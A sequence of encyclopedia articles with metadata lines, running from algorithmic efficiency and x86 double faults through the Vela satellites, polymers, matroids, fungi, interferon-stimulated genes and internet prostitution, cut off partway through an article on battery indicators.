a cache miss for a value in RAM. While originally motivated to create the impression of higher amounts of memory being available than were truly available, virtual memory is more important in contemporary usage for its time-space tradeoff and enabling the usage of virtual machines. Cache misses from main memory are called page faults, and incur huge performance penalties on programs. An algorithm whose memory needs will fit in cache memory will be much faster than an algorithm which fits in main memory, which in turn will be very much faster than an algorithm which has to resort to paging. Because of this, cache replacement policies are extremely important to high-performance computing, as are cache-aware programming and data alignment. To further complicate the issue, some systems have up to three levels of cache memory, with varying effective speeds. Different systems will have different amounts of these various types of memory, so the effect of algorithm memory needs can vary greatly from one system to another. In the early days of electronic computing, if an algorithm and its data would not fit in main memory then the algorithm could not be used. Nowadays the use of virtual memory appears to provide much more memory, but at the cost of performance. Much higher speed can be obtained if an algorithm and its data fit in cache memory; in this case minimizing space will also help minimize time. This is called the principle of locality, and can be subdivided into locality of reference, spatial locality, and temporal locality. An algorithm which will not fit completely in cache memory but which exhibits locality of reference may perform reasonably well. See also Analysis of algorithms—how to determine the resources needed by an algorithm Benchmark—a method for measuring comparative execution times in defined cases Best, worst and average case—considerations for estimating execution times in three scenarios Compiler optimization—compiler-derived optimization Computational complexity theory Computer performance—computer hardware metrics Empirical algorithmics—the practice of using empirical methods to study the behavior of algorithms Optimization (computer science) Performance analysis—methods of measuring actual performance of an algorithm at run-time References Analysis of algorithms Computer performance Software optimization Software quality
Algorithmic efficiency
Technology
3,629
1,501,233
https://en.wikipedia.org/wiki/Double%20fault
On the x86 architecture, a double fault exception occurs if the processor encounters a problem while trying to service a pending interrupt or exception. An example situation when a double fault would occur is when an interrupt is triggered but the segment in which the interrupt handler resides is invalid. If the processor encounters a problem when calling the double fault handler, a triple fault is generated and the processor shuts down. As double faults can only happen due to kernel bugs, they are rarely caused by user space programs in a modern protected mode operating system, unless the program somehow gains kernel access (some viruses and also some low-level DOS programs). Other processors like PowerPC or SPARC generally save state to predefined and reserved machine registers. A double fault will then be a situation where another exception happens while the processor is still using the contents of these registers to process the exception. SPARC processors have four levels of such registers, i.e. they have a 4-window register system. See also Triple fault Further reading * Computer errors Central processing unit
Double fault
Technology
212
31,155,242
https://en.wikipedia.org/wiki/UGC%206945
UGC 6945 (also known as Arp 194) is a trio of interacting galaxies. The highly disrupted galaxy to the northwest is actually two galaxies in the advanced stages of merger, and has an angular size of . About 40″ to the southeast is a third galaxy with an angular size of . Based upon a radial velocity of about 10,500 km s−1, the interacting pair of galaxies at the northwest are located at a distance of from us (assuming a Hubble constant value of ). If we further assume that the third galaxy lies at the same distance away from us, we find that the galaxies are separated by a projected linear distance of roughly , though later findings from Hubble may cast this assumption into doubt (see below). As the pair of galaxies in the north gravitationally interact with each other, tidally-stripped gas from both galaxies is draped over the southern galaxy as a series of blobs, which are fueling a burst of star formation. While it has long been believed to be interacting with the northern galaxy, images from the Hubble Space Telescope clearly show that this stream of material is actually superimposed on the southern galaxy. This suggests that this third galaxy may actually lie in the background. Due to this uncertainty, the third galaxy may not be involved in the interaction. See also List of Hubble anniversary images References External links Spiral galaxies Interacting galaxies 6945 194 Ursa Major
UGC 6945
Astronomy
286
630,088
https://en.wikipedia.org/wiki/Vela%20%28satellite%29
Vela was the name of a group of satellites developed as the Vela Hotel element of Project Vela by the United States to detect nuclear detonations and monitor Soviet Union compliance with the 1963 Partial Test Ban Treaty. Vela started out as a small budget research program in 1959. It ended 26 years later as a successful, cost-effective military space system, which also provided scientific data on natural sources of space radiation. In the 1970s, the nuclear detection mission was taken over by the Defense Support Program (DSP) satellites. In the late 1980s, it was augmented by the Navstar Global Positioning System (GPS) satellites. The program is now called the Integrated Operational NuDet (Nuclear Detonation) Detection System (IONDS). Deployment Twelve satellites were built, six of the Vela Hotel design and six of the Advanced Vela design. The Vela Hotel series was to detect nuclear tests in space, while the Advanced Vela series was to detect not only nuclear explosions in space but also in the atmosphere. All spacecraft were manufactured by TRW and launched in pairs, either on an Atlas–Agena or Titan III-C boosters. They were placed in orbits of 118,000 km (73,000 miles) to avoid particle radiation trapped in the Van Allen radiation belts. Their apogee was about one-third of the distance to the Moon. The first Vela Hotel pair was launched on 17 October 1963, one week after the Partial Test Ban Treaty went into effect, and the last in 1965. They had a design life of six months, but were only actually shut down after five years. Advanced Vela pairs were launched in 1967, 1969, and 1970. They had a nominal design life of 18 months, later changed to seven years. However, the last satellite to be shut down was Vehicle 9 in 1984, which had been launched in 1969 and had lasted nearly 15 years. The Vela series began with the launch of Vela 1A and 1B on 17 October 1963, a flight also marking the maiden voyage of the Atlas-Agena SLV-3 vehicle. The second pair of satellites launched on 17 July 1964, and the third on 20 July 1965. The last launch miscarried slightly when one Atlas vernier engine shut down at liftoff, while the other vernier operated at above-normal thrust levels. This resulted in a slightly lower than normal inclination for the satellites, however the mission was carried out successfully. The problem was traced to a malfunction of the vernier LOX poppet valve. Subsequent Vela satellites were switched to the Titan IIIC booster due to their increased weight and complexity. Three more sets were launched on 28 April 1967, 23 May 1969, and 8 April 1970. The last pair of Vela satellites operated until 1985, when they were finally shut down; the Air Force claimed them to be the world's longest operating satellites. They remained in orbit until their orbits decayed at the end of 1992. Instruments The original Vela satellites were equipped with 12 external X-ray detectors and 18 internal neutron and gamma-ray detectors. They were equipped with solar panels generating 90 watts. The Advanced Vela satellites were additionally equipped with two non-imaging silicon photodiode sensors called bhangmeters which monitored light levels over sub-millisecond intervals. They could determine the location of a nuclear explosion to within about 3,000 miles. Atmospheric nuclear explosions produce a unique signature, often called a "double-humped curve": a short and intense flash lasting around 1 millisecond, followed by a second much more prolonged and less intense emission of light taking a fraction of a second to several seconds to build up. The effect occurs because the surface of the early fireball is quickly overtaken by the expanding atmospheric shock wave composed of ionised gas. Although it emits a considerable amount of light itself it is opaque and prevents the far brighter fireball from shining through. As the shock wave expands, it cools down becoming more transparent allowing the much hotter and brighter fireball to become visible again. No single natural phenomenon is known to produce this signature, although there was speculation that the Velas could record exceptionally rare natural double events, such as a meteoroid strike on the spacecraft that produces a bright flash or triggering on a lightning superbolt in the Earth's atmosphere, as may have occurred in the Vela incident. They were also equipped with sensors which could detect the electromagnetic pulse from an atmospheric explosion. Additional power was required for these instruments, and these larger satellites consumed 120 watts generated from solar panels. Serendipitously, the Vela satellites were the first devices ever to detect cosmic gamma ray bursts. Role in discovering gamma-ray bursts On 2 July 1967, at 14:19 UTC, the Vela 4 and Vela 3 satellites detected a flash of gamma radiation unlike any known nuclear weapons signature. Uncertain what had happened but not considering the matter particularly urgent, the team at the Los Alamos Scientific Laboratory, led by Ray Klebesadel, filed the data away for investigation. As additional Vela satellites were launched with better instruments, the Los Alamos team continued to find inexplicable gamma-ray bursts in their data. By analyzing the different arrival times of the bursts as detected by different satellites, the team was able to determine rough estimates for the sky positions of sixteen bursts and definitively rule out a terrestrial or solar origin. Contrary to popular belief, the data was never classified. After thorough analysis, the findings were published in 1973 as an Astrophysical Journal article entitled "Observations of Gamma-Ray Bursts of Cosmic Origin". This alerted the astronomical community to the existence of gamma-ray bursts, now recognised as the most violent events in the universe. Vela 5A and 5B The scintillation X-ray detector (XC) aboard Vela 5A and its twin Vela 5B consisted of two 1 mm thick NaI(Tl) crystals mounted on photomultiplier tubes and covered by a 0.13 mm thick beryllium window. Electronic thresholds provided two energy channels, 3–12 keV and 6–12 keV. In addition to the x-ray Nova announcement indicated above the XC Detector aboard Vela 5A and 5B also discovered and announced the first X-ray burst ever reported. The announcement of this discovery predated the initial announcement of the discovery of gamma-ray bursts by 2 years. In front of each crystal was a slat collimator providing a full width at half maximum (FWHM) aperture of c. 6.1 × 6.1 degrees. The effective detector area was c. 26 cm2. The detectors scanned a great circle every 60 seconds, and covered the whole sky every 56 hours. Sensitivity to celestial sources was severely limited by the high intrinsic detector background, equivalent to about 80% of the signal from the Crab Nebula, one of the brightest sources in the sky at these wavelengths. The Vela 5B satellite X-ray detector remained functional for over ten years. Vela 6A and 6B Like the previous Vela 5 satellites, the Vela 6 nuclear test detection satellites were part of a program run jointly by the Advanced Research Projects of the U.S. Department of Defense and the U.S. Atomic Energy Commission, managed by the U.S. Air Force. The twin spacecraft, Vela 6A and 6B, were launched on 8 April 1970. Data from the Vela 6 satellites were used to look for correlations between gamma-ray bursts and X-ray events. At least two good candidates were found, GB720514 and GB740723. The X-ray detectors failed on Vela 6B on 27 January 1972 and on Vela 6A on 12 March 1972. Controversial observations Some controversy still surrounds the Vela program. On 22 September 1979 the Vela 5B satellite (also known as Vela 10 and IRON 6911) detected the characteristic double flash of an atmospheric nuclear explosion near the Prince Edward Islands. Still unsatisfactorily explained, this event has become known as the Vela incident. President Jimmy Carter initially deemed the event to be evidence of a joint Israeli and South African nuclear test, though the now-declassified report of a scientific panel he subsequently appointed while seeking reelection concluded that it was probably not the event of a nuclear explosion. In 2018, a new study confirmed that it is highly likely that it was a nuclear test, conducted by Israel. An alternative explanation involves a magnetospheric event affecting the instruments. An earlier incident occurred when an intense solar storm on 4 August 1972 triggered the system to event mode as if an explosion occurred, but this was quickly resolved by personnel monitoring the data in real-time. See also Timeline of artificial satellites and space probes References External links Includes material from NASA Goddard's Remote Sensing Tutorial. Orbits (the orbital elements are not updated, as no reliable tracking information is being provided for these satellites. The orbits in the following links may be based on data from older epochs): 1963 in spaceflight Reconnaissance satellites of the United States Nuclear weapons testing Military space program of the United States Gamma-ray bursts Satellite series Military equipment introduced in the 1960s Measurement and signature intelligence
Vela (satellite)
Physics,Astronomy,Technology
1,884
28,413,819
https://en.wikipedia.org/wiki/Poly%28p-phenylene%20oxide%29
Poly(p-phenylene oxide) (PPO), poly(p-phenylene ether) (PPE), poly(oxy-2,6-dimethyl-1,4-phenylene), often referred to simply as polyphenylene oxide, is a high-temperature thermoplastic with the general formula (C8H8O)n. It is rarely used in its pure form due to difficulties in processing. It is mainly used as blend with polystyrene, high impact styrene-butadiene copolymer or polyamide. PPO is a registered trademark of SABIC Innovative Plastics B.V. under which various polyphenylene ether resins are sold. History Polyphenylene ether was discovered in 1959 by Allan Hay, and was commercialized by General Electric in 1960. While it was one of the cheapest high-temperature resistant plastics, processing was difficult, while the impact and heat resistance gradually decreased with time. Mixing it with polystyrene in any ratio could compensate for the disadvantages. In the 1960s, modified PPE came into the market under the trademark Noryl. Properties PPE is an amorphous high-performance plastic. The glass transition temperature is 215 °C, but it can be varied by mixing with polystyrene. Through modification and the incorporation of fillers such as glass fibers, the properties can be extensively modified. Applications PPE blends are used for structural parts, electronics, household and automotive items that depend on high heat resistance, dimensional stability and accuracy. They are also used in medicine for sterilizable instruments made of plastic. The PPE blends are characterized by hot water resistance with low water absorption, high impact strength, halogen-free fire protection and low density. This plastic is processed by injection molding or extrusion; depending on the type, the processing temperature is 260–300 °C. The surface can be printed, hot-stamped, painted or metallized. Welds are possible by means of heating element, friction or ultrasonic welding. It can be glued with halogenated solvents or various adhesives. This plastic is also used to produce air separation membranes for generating nitrogen. The PPO is spun into a hollow fiber membrane with a porous support layer and a very thin outer skin. The permeation of oxygen occurs from inside to out across the thin outer skin with an extremely high flux. Due to the manufacturing process, the fiber has excellent dimensional stability and strength. Unlike hollow fiber membranes made from polysulfone, the aging process of the fiber is relatively quick so that air separation performance remains stable throughout the life of the membrane. PPO makes the air separation performance suitable for low temperature () applications where polysulfone membranes require heated air to increase permeation. Production from natural products Natural phenols can be enzymatically polymerized. Laccase and peroxidase induce the polymerization of syringic acid to give a poly(1,4-phenylene oxide) bearing a carboxylic acid at one end and a phenolic hydroxyl group at the other. References Translated from the article Polyphenylenether on the German Wikipedia. External links Molecular electronics Organic polymers Polyethers Organic semiconductors Engineering plastic Thermoplastics Diphenyl ethers
Poly(p-phenylene oxide)
Chemistry,Materials_science
702
36,886,954
https://en.wikipedia.org/wiki/Bipartite%20matroid
In mathematics, a bipartite matroid is a matroid all of whose circuits have even size. Example A uniform matroid is bipartite if and only if is an odd number, because the circuits in such a matroid have size . Relation to bipartite graphs Bipartite matroids were defined by as a generalization of the bipartite graphs, graphs in which every cycle has even size. A graphic matroid is bipartite if and only if it comes from a bipartite graph. Duality with Eulerian matroids An Eulerian graph is one in which all vertices have even degree; Eulerian graphs may be disconnected. For planar graphs, the properties of being bipartite and Eulerian are dual: a planar graph is bipartite if and only if its dual graph is Eulerian. As Welsh showed, this duality extends to binary matroids: a binary matroid is bipartite if and only if its dual matroid is an Eulerian matroid, a matroid that can be partitioned into disjoint circuits. For matroids that are not binary, the duality between Eulerian and bipartite matroids may break down. For instance, the uniform matroid is non-bipartite but its dual is Eulerian, as it can be partitioned into two 3-cycles. The self-dual uniform matroid is bipartite but not Eulerian. Computational complexity It is possible to test in polynomial time whether a given binary matroid is bipartite. However, any algorithm that tests whether a given matroid is Eulerian, given access to the matroid via an independence oracle, must perform an exponential number of oracle queries, and therefore cannot take polynomial time. References Matroid theory
Bipartite matroid
Mathematics
373
44,939,434
https://en.wikipedia.org/wiki/Interferon-stimulated%20gene
An interferon-stimulated gene (ISG) is a gene that can be expressed in response to stimulation by interferon. Interferons bind to receptors on the surface of a cell, initiating protein signaling pathways within the cell. This interaction leads to the expression of a subset of genes involved in the innate immune system response. ISGs are commonly expressed in response to viral infection, but also during bacterial infection and in the presence of parasites. It's currently estimated that 10% of the human genome is regulated by interferons (IFNs). Interferon stimulated genes can act as an initial response to pathogen invasion, slowing down viral replication and increasing expression of immune signaling complexes. There are three known types of interferon. With approximately 450 genes highly expressed in response to interferon type I. Type I interferon consists of INF-α, INF-β, INF-ω and is expressed in response to viral infection. ISGs induced by type I interferon are associated with viral replication suppression and increase expression of immune signaling proteins. Type II interferon consists only of INF-γ and is associated with controlling intracellular pathogens and tumor suppressor genes. Type III interferon consists of INF-λ and is associated with viral immune response and is key in anti-fungal neutrophil response. Expression ISGs are genes whose expression can be stimulated by interferon, but may also be stimulated by other pathways. Interferons are a type of protein called a cytokine, which is produced in response to infection. When released, they signal to infected cells and other nearby cells that a pathogen is present. This signal is passed from one cell to another by binding of the interferon to a cell surface receptor on a naïve cell. The receptor and interferon are taken inside the cell while bound to initiate expression of ISGs. Interferon activation of ISGs uses the JAK-STAT signaling pathway to induce transcription of ISGs. ISGs can be divided based on what class of interferon they are activated by: type I, type II, or type III interferon. The protein products of ISGs control pathogen infections. Specifically, type I and type III interferons are antiviral cytokines, triggering ISGs that combat viral infections. Type I interferons are also involved in bacterial infections; however, they can have both beneficial and harmful effects. The type II interferon class only has one cytokine (IFN-γ), which has some antiviral activity, but is more important in establishing cellular immunity through activating macrophages and promoting major histocompatibility complex (MHC) class II. All ISG stimulation pathways result in the production of transcription factors. Type I and type III interferons produce a protein complex called ISGF3, which acts as a transcription factor, and binds to a promoter sequence called ISRE (interferon stimulated response element). Type II interferons produce a transcription factor called GAF, which binds to a promoter sequence called GAS. These interactions initiate gene expression. These pathways are also commonly initiated by a Toll-like receptor (TLR) on the cell surface. The number and type of ISGs expressed in response to infection is specific to the infecting pathogen. Family of Interferon stimulated genes IFIT Family of Interferon stimulated genes The IFIT family of ISGs is located on chromosome 10 in humans and is homologous in mammals, birds, and fish. The IFIT family is commonly induced by type I and type III interferon. IFIT gene expression has been observed in response to both DNA and RNA viral infection. IFIT genes suppress viral infection primarily by limiting viral RNA and DNA replication. IFIT proteins 1,2,3 and 5 can bind directly to double-stranded triphosphate RNA. These IFIT proteins form a complex that destroys the viral RNA. IFIT 1 and IFIT 2 directly bind Eukaryotic initiation factor 3,  which reduces more than 60% of protein translation in the targeted cell. Function ISGs have a wide range of functions used to combat infection at all stages of a pathogen's lifestyle. For a viral infection, examples include: prohibiting entry of the virus into uninfected cells, stopping viral replication, and preventing the virus from leaving an infected cell. Another ISG function is regulating interferon sensitivity of a cell. The expression of pattern recognition receptors like a TLR or common signaling proteins like those found in the JAK-STAT pathway may be up regulated by interferons, making the cell more sensitive to interferons. As such a large portion of the human genome is associated with interferon ISG have a broad range of functions. ISG are essential for fighting off viral bacterial and parasitic pathogens. Interferon stimulates genes that help active immune response and suppress infection at almost all stages of infection. inhibition of viral RNA There are 21 known ISGs that inhibit RNA virus replication. Primarily ISG bind to and degrade RNA to prevent viral instructions from being translated into viral proteins. These ISG can specifically target double stranded triphosphate RNA which is distinct from single stranded RNA present in human cells. ISG can also non specifically target mRNA and destroy it. Cell wide mRNA degradation prevents both viral and host proteins from being produced. The mRNA of INF-α and other key immune proteins are resistant to this cell wide degradation to allow immune signals to continue while translation is inhibited. Apoptotic effects There are 15 known ISG that help induce apoptosis. It is likely that none of these genes trigger apoptosis alone but their expression has been linked to apoptosis. Higher expression of ISG make the cell more susceptible to natural killer cells. See also Interferome References Cytokines
Interferon-stimulated gene
Chemistry
1,197
24,507,568
https://en.wikipedia.org/wiki/Gymnopilus%20subtropicus
Gymnopilus subtropicus is a species of agaric fungus in the family Hymenogastraceae. Taxonomy and Phylogeny The scientific name for this species is Gymnopilus subtropicus. It was first described by mycologist Lexemuel Ray Hesler in his 1969 monograph "North American Species of Gymnopilus", with the type collections made by Harry D. Thiers near Biloxi, Mississippi in 1959 (Hesler, 1969). This species is classified in the genus Gymnopilus in the family Hymenogastraceae (Matheny et al., 2015). The genus Gymnopilus was established in 1879 by the Finnish mycologist Petter Adolf Karsten (1834-1917). Karsten proposed the name in his book "Bidrag till Kännedom om Finlands Hattsvampar" (Contributions to the Knowledge of Finland's Gilled Fungi) (Karsten,1879). Gymnopilus fungi are a diverse group of saprobic mushrooms that typically grow on wood (Hesler, 1969). They are characterized by their rusty brown spore prints, yellow to orange gills, and, when present, a typically cobwebby and ephemeral partial veil. Gymnopilus subtropicus' closest relatives are other members of the genus Gymnopilus, although it has not yet been included in molecular phylogenetic studies. Morphology G. subtropicus produces medium-sized mushrooms with yellow, fibrillose caps 1.4-4.5 cm broad. The gills are crowded, broad, adnate-decurrent. The stipe is 3.5-4 cm long by 3-5 mm thick, enlarged at the base, and yellowish above and brownish below. It has a cobweb-like partial veil when young, often remaining on the stipe, forming a ring. Microscopically, it has ellipsoid spores measuring 5.5-7 x 4-4.5 μm that are dextrinoid. Gymnopilus subtropicus can be identified by several distinctive features including yellow cap scales, dextrinoid spores, interwoven cap tissue, and caulocystidia. Similar Species It is similar to G. lepidotus and G. pacificus but differs microscopically. Identifying Gymnopilus species is known to be challenging, even for experts. Ecology G. subtropicus grows on oak and palm logs in subtropical forests across Florida, Mississippi, Louisiana, and Hawaii, fruiting from March to August (Hesler 1969). Human Uses and Relevance Some Gymnopilus species have psychoactive properties, but the biochemistry of G. subtropicus is unknown. It contributes to decomposition in its native ecosystems. References Hesler, L.R. (1969). North American species of Gymnopilus. Mycologia Memoir No. 3. J. Cramer: NY. 117 pp. Karsten P.A. (1879) Bidrag till Kännedom om Finlands Hattsvampar. Helsingfors. Matheny, P.B. et al. (2015). Two new genera of Agaricales. Systematics and Biodiversity. 13(1), 28–41. Strauss, D. et al. (2022). Taxonomy, phylogenetics of psychedelic mushrooms. Frontiers in Forests and Global Change,'' 5, 1–9. subtropicus Fungi of North America Taxa named by Lexemuel Ray Hesler Fungi described in 1969 Fungus species
Gymnopilus subtropicus
Biology
747
55,383,649
https://en.wikipedia.org/wiki/Taper%20burn%20mark
Taper burn marks are deep flame shaped scorch marks often found on the timber beams of early modern houses. They were originally thought to have been accidental scorches from a taper candle, but research suggests that most marks may have been made deliberately, as there is clear patterning of the activity. They are theorised to have been made as part of a folk superstition, then thought to protect the building from fire and lightning. They are often found around entrances to the home such as fireplaces, doors and windows. Over 80 such marks have been discovered in the Tower of London. See also Apotropaic mark References Anthropology of religion Magic symbols Folklore Religious practices
Taper burn mark
Biology
141
797,238
https://en.wikipedia.org/wiki/Clifford%E2%80%93Klein%20form
In mathematics, a Clifford–Klein form is a double coset space , where G is a reductive Lie group, H a closed subgroup of G, and Γ a discrete subgroup of G that acts properly discontinuously on the homogeneous space G/H. A suitable discrete subgroup Γ may or may not exist, for a given G and H. If Γ exists, there is the question of whether can be taken to be a compact space, called a compact Clifford–Klein form. When H is itself compact, classical results show that a compact Clifford–Klein form exists. Otherwise it may not, and there are a number of negative results. History According to Moritz Epple, the Clifford-Klein forms began when W. K. Clifford used quaternions to twist their space. "Every twist possessed a space-filling family of invariant lines", the Clifford parallels. They formed "a particular structure embedded in elliptic 3-space", the Clifford surface, which demonstrated that "the same local geometry may be tied to spaces that are globally different." Wilhelm Killing thought that for free mobility of rigid bodies there are four spaces: Euclidean, hyperbolic, elliptic and spherical. They are spaces of constant curvature but constant curvature differs from free mobility: it is local, the other is both local and global. Killing's contribution to Clifford-Klein space forms involved formulation in terms of groups, finding new classes of examples, and consideration of the scientific relevance of spaces of constant curvature. He took up the task to develop physical theories of CK space forms. Karl Schwarzchild wrote “The admissible measure of the curvature of space”, and noted in an appendix that physical space may actually be a non-standard space of constant curvature. See also Killing-Hopf theorem Space form References Moritz Epple (2003) From Quaternions to Cosmology: Spaces of Constant Curvature ca. 1873 — 1925, invited address to International Congress of Mathematicians Lie groups Homogeneous spaces
Clifford–Klein form
Physics,Mathematics
399
66,341,767
https://en.wikipedia.org/wiki/Task%20Force%20on%20Process%20Mining
The IEEE Task Force on Process Mining (TFPM) is a non-commercial association for process mining. The IEEE (Institute of Electrical and Electronics Engineers) Task Force on Process Mining was established in October 2009 as part of the IEEE Computational Intelligence Society at the Eindhoven University of Technology. The task force is supported by over 80 organizations and has around 750 members. The main goal of the task force is to promote the research, development, education, and understanding of process mining. About In 2012, the IEEE World Congress on Computational Intelligence/ IEEE Congress on Evolutionary Computation held a session on Process Mining. Process mining is a type of research that is a mix of computational intelligence and data mining, as well as process modeling and analysis. Activities and organization The Task Force on Process Mining has a Steering Committee and an Advisory Board. The Steering Committee, was chaired by Wil van der Aalst in its inception in 2009, defined 15 action lines. These include the organization of the annual International Process Mining Conference (ICPM) series, standardization efforts leading to the IEEE XES standard for storing and exchanging event data, and the Process Mining Manifesto which was translated into 16 languages. The Task Force on Process Mining also publishes a newsletter, provides data sets, organizes workshops and competitions, and connects researchers and practitioners. In 2016, the IEEE Standards Association published the IEEE Standard for Extensible Event Stream (XES), which is a widely accepted file format by the process mining community. As of 2023, Boudewijn van Dongen serves as chair of the Steering Committee. Wil van der Aalst and Moe Wynn both serve as vice-chair of the Steering Committee. See also Process mining Business process management References Further reading Aalst, W. van der (2016). Process Mining: Data Science in Action. Springer Verlag, Berlin (). Reinkemeyer, L. (2020). Process Mining in Action: Principles, Use Cases and Outlook. Springer Verlag, Berlin (). Information science Computer occupations Computational fields of study Data analysis
Task Force on Process Mining
Technology
413
42,194,912
https://en.wikipedia.org/wiki/Lyophyllum%20eucalypticum
Lyophyllum eucalypticum is a species of fungus in the family Lyophyllaceae. Found in Australia, it was first described as a species of Tricholoma by English mycologist Arthur Anselm Pearson in 1951. Meinhard Michael Moser transferred it to Lyophyllum in 1986. This white, wooly tropical mushroom is similar to other mushroom species, such as Macrofungus that looks similar but only grows in Australia. The distinguishing features are its deep purple borders, which are typically trimmed with black rings. It has wide wings that spread out as the mushroom matures. References External links Lyophyllaceae Fungi described in 1951 Fungi of Australia Fungus species
Lyophyllum eucalypticum
Biology
145
75,185,887
https://en.wikipedia.org/wiki/VT%201137-0337
VT 1137-0337 is a extragalactic pulsar wind nebula (possibly a magnetar nebula) that is located 395 million light years away from planet earth in the dwarf galaxy named SDSS J113706.18-033737.1, a galaxy going through a burst of star formation. It was created through the supernova of a massive star just 14-80 years ago. Formation VT 1137-0337 was formed 14 to 80 years ago when a massive star went supernova leaving behind a supernova remnant and a young pulsar type fast spinning neutron star. Neutron star The neutron star left at the center of VT 1137-0337 is fast spinning pulsar type neutron star that has a strong magnetic field creating charged particles travelling at the speed of light in the surrounding space creating a strong radio emission. Discovery The nebula VT 1137-0337 was spotted by using the Very Large Array Sky Survey (also called VLASS). References Pulsar wind nebulae Leo (constellation) Astronomical objects discovered in 2022
VT 1137-0337
Astronomy
217
43,114,929
https://en.wikipedia.org/wiki/Internet%20prostitution
The Internet has become one of the preferred methods of communication for prostitution, as clients and prostitutes are less vulnerable to arrest or assault and for its convenience. Origins of Internet advertising During the latter half of the twentieth century, most off-street prostitution was advertised locally using personal advertisements in the printed press or postcards in the windows of commercial premises such as newsagent's shops. As direct references to prostitution were not acceptable, the advertisements were carefully worded with euphemistic terms such as large chest for sale. In larger cities, tart cards were placed in telephone boxes. By the year 2000, the Internet, and access to it had grown large enough for some in the sex industry to see it as a marketing tool. As use of the Internet has subsequently grown, so has the use of it by the sex industry. In 2007 Harriet Harman, then Minister for Women in the UK, put pressure on the Newspaper Society, the trade body representing local newspapers, not to carry advertisements for sexual services. As a result, the society updated its guidelines for members in 2008, effectively banning such advertisements. As the majority of local newspapers were members, this ban increased the move towards Internet advertising. Mobile devices such as smartphones have further increased the use of the Internet both generally and for prostitution websites. In the Netherlands, the Internet had grown in importance by the mid 2010s as a platform for recruiting prostitutes' clients, with escort workers advertising their mobile telephone numbers online. Types of websites Listing sites There has been a rise in the number of escort/prostitution listing websites, that advertise for both independent and agency escorts. Some are free, while others charge to add a listing. Others are free for a basic listing but charge for some additional features. A notable example is the website The Erotic Review. Forums Forums were amongst the first sites to be used by escorts. With the rise of other social media, their use has declined. Personal websites It has become simple and easy for independent escorts to create a personal website for the purposes of advertising their prostitution services. Reviews A number of sites have a section where clients can leave reviews for escorts. Some outside the industry regard this as degrading to the escort; however, most involved in the industry do not share this view. The practice of posting online reviews of escorts dates back to 1999 when The Erotic Review, a review site that allows customers to rate their experiences with sex workers, was created. Punternet was originally the foremost review site despite adverse publicity from Harriet Harman and Vera Baird (see below). In recent years, Adultwork has had a larger number of reviews posted. UK Punting, founded in 2010, is a sex worker review website which only includes client comments and has no input from sex workers. Books reviewing the providers of sexual services in the United Kingdom have been published by George McCoy since 1996 and by 2013 McCoy was running a website reviewing over 5,000 massage parlours and individuals. Safety A feature of some early websites, particularly forums, were sections where safety warnings could be posted about dangerous clients, referred to as "dodgy punters" (and to a lesser degree, bad escorts). As these warnings were spread over about a dozen websites, the process of keeping up to date with the information in them could be time-consuming. In 2006, talks took place in the industry about setting up a centralised warning website that would be automatically updated from the existing websites by RSS feeds. It was agreed that a newly created website, Saafe, would carry the centralised warnings. The new website launched in January 2007. However, the centralised warnings did not work as well as envisaged and the project was discontinued in 2010. In December 2011, Lynne Featherstone, then Equalities Minister, announced the Home Office would provide £108,000 to establish a national online network to collate and distribute information between schemes that allow sex workers to report violent incidents, known as "Ugly Mugs" schemes. This money was to fund a 12-month pilot scheme run by UK Network of Sex Work Projects (UKNSWP). On 6 July 2012, the National Ugly Mugs Pilot Scheme was launched. The scheme was a success and continued after the 12-month pilot period. Social media Since the rise of social media, escorts and escort agencies have used sites such as Facebook and Twitter to promote their services. Because of its more relaxed guidelines, Twitter is the most popular. With the rise of social media as a means of communication, the use of forums by sex workers and their clients has fallen. Online payments The rise of online payment systems have enabled escorts and agencies to take payments for services. When PayPal first started in 2001, escorts were amongst their first customers. PayPal subsequently changed its policies and no longer allows escorts to use the system. In 2013, escort agency Passion VIP of Birmingham, England became the first agency to accept the virtual currency Bitcoin. Controversies Punternet In 2009 Harriet Harman asked the then governor of California Arnold Schwarzenegger to close down the Punternet website. She said that it was increasing the demand for prostitution in the UK, an activity which she described as degrading to women and which she said was putting them at risk. Punternet is hosted in California, despite being a review site for prostitution in the UK. Harman's actions did not result in the website being closed down; instead it received an increase in traffic due to the publicity generated. The website owners thanked Harman for the increase in business. In January 2010 at a Westminster Hall debate on Violence against Women, then Solicitor General Vera Baird again called for the site to be taken down. In 2018 Trishna Datta, an outreach worker from Ilford, Essex, launched a petition to have the Punternet website taken down. She said that website lacked adequate safety measures to ensure details which could put sex workers in danger were not revealed. Additionally she expressed concern that some of the sex workers reviewed on the site might be underage or victims of trafficking or sexual assault. Punternet commented that they would report underage prostitutes to the authorities, and that they encourage customers to report underage prostitutes and victims of trafficking to Crimestoppers UK. Bogus escort agencies scam In 2010, Suffolk Trading standards started Operation Troy, targeting bogus online escort agencies. These agencies promised large earnings in an effort to recruit escorts. A registration fee was charged to those wanting to join, but no work materialised. In July 2013, six members of the gang running this scam were jailed. The leader, Toni Muldoon, was sentenced to seven and a half years. It was estimated the scam netted £5.7m from 14,000 victims. Adultwork AdultWork is a UK website which allows sex workers to specify the services they provide before being booked for a job. The site is funded by sex workers, who pay to have their profiles displayed. In February 2014, an unnamed Northern Irish woman successfully sued the website for unauthorised use of intimate photographs of herself. She was awarded £28,000 damages. See also Bad date list Prostitution in the United Kingdom References External links National Ugly Mugs Scheme Ireland & UK Ugly Mugs Service Prostitution in the United Kingdom Sexuality and computing
Internet prostitution
Technology
1,473
11,438,601
https://en.wikipedia.org/wiki/Battery%20indicator
A battery indicator (also known as a battery gauge) is a device which gives information about a battery. This will usually be a visual indication of the battery's state of charge. It is particularly important in the case of a battery electric vehicle. Automobiles Some automobiles are fitted with a battery condition meter to monitor the starter battery. This meter is, essentially, a voltmeter but it may also be marked with coloured zones for easy visualization. Many newer cars no longer offer voltmeters or ammeters; instead, these vehicles typically have a light with the outline of an automotive battery on it. This can be somewhat misleading as it may be confused for an indicator of a bad battery when in reality it indicates a problem with the vehicle's charging system. Alternatively, an ammeter may be fitted. This indicates whether the battery is being charged or discharged. In the adjacent picture, the ammeter is marked "Alternator" and the symbols are "C" (charge) and "D" (discharge). Both ammeters and voltmeters individually or together can be used to assess the operating state of an automobile battery and charging system. Electronic devices A battery indicator is a feature of many electronic devices. In mobile phones, the battery indicator usually takes the form of a bar graph - the more bars that are showing, the better the battery's state of charge. Computers Computers may give a signal to users that an internal standby battery needs replacement. Portable computers using rechargeable batteries generally give the user some indication of the remaining operating time left on the battery. A Smart Battery System uses a controller integrated with an interchangeable battery pack to provide a more accurate indication of the state of battery charge. Batteries not part of a system Batteries that are part of a system, such as computer batteries, can have their properties checked and logged in operation to assist in determining remaining charge. A real battery can be modeled as an ideal 